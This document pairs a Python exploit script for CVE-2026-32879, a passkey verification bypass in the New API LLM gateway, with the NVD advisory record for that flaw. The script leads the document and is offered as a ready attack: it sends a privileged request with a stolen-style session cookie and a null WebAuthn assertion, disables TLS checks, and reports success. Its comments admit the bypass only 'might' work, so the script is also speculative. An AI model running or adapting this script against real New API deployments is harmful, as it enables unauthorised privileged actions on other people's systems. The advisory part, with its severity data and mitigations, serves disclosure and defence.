CVE-2026-32879

import requests # Target URL (Example) target_url = "https://target-new-api.com/api/secure/action" session_cookie = "valid_session_token_here" headers = { "Cookie": f"session={session_cookie}", "Content-Type": "application/json" } # The vulnerability allows satisfying the secure check without the WebAuthn assertion. # Exploit payload attempting to bypass the verification step. payload = { "action": "privileged_operation", "verification_method": "passkey", # Normally a valid 'webauthn_assertion' is required here, # but due to the logic flaw, omitting it or sending an incomplete one # might satisfy the check if the user has a passkey registered. "webauthn_assertion": None } try: response = requests.post(target_url, json=payload, headers=headers, verify=False) if response.status_code == 200: print("[+] Exploit successful! Action executed.") print(f"[+] Response: {response.text}") else: print(f"[-] Exploit failed. Status code: {response.status_code}") except Exception as e: print(f"[-] Error: {e}")

{"cve": {"id": "CVE-2026-32879", "sourceIdentifier": "[email protected]", "published": "2026-03-23T20:16:27.373", "lastModified": "2026-03-25T17:52:28.520", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "New API is a large language mode (LLM) gateway and artificial intelligence (AI) asset management system. Starting in version 0.10.0, a logic flaw in the universal secure verification flow allows an authenticated user with a registered passkey to satisfy secure verification without completing a WebAuthn assertion. As of time of publication, no known patched versions are available. Until a patched release is applied, do not rely on passkey as the step-up method for privileged secure-verification actions; require TOTP/2FA for those actions where operationally possible; or temporarily restrict access to affected secure-verification-protected endpoints."}, {"lang": "es", "value": "Nueva API es una pasarela de modo de lenguaje grande (LLM) y un sistema de gestión de activos de inteligencia artificial (IA). A partir de la versión 0.10.0, una falla lógica en el flujo de verificación segura universal permite a un usuario autenticado con una clave de acceso (passkey) registrada satisfacer la verificación segura sin completar una aserción WebAuthn. A la fecha de publicación, no hay versiones parcheadas conocidas disponibles. Hasta que se aplique una versión parcheada, no confíe en la clave de acceso (passkey) como método de elevación para acciones privilegiadas de verificación segura; requiera TOTP/2FA para esas acciones donde sea operacionalmente posible; o restrinja temporalmente el acceso a los puntos finales afectados protegidos por verificación segura."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-287"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:newapi:new_api:*:*:*:*:*:*:*:*", "versionStartIncluding": "0.10.0", "versionEndExcluding": "0.11.9", "matchCriteriaId": "EF65AC0F-AAD5-448C-9518-09F014D43036"}, {"vulnerable": true, "criteria": "cpe:2.3:a:newapi:new_api:0.11.9:alpha1:*:*:*:*:*:*", "matchCriteriaId": "33AF3DD3-4364-45D6-A2EB-775B5AAB406B"}]}]}], "references": [{"url": "https://github.com/QuantumNous/new-api/security/advisories/GHSA-5353-f8fq-65vc", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}]}}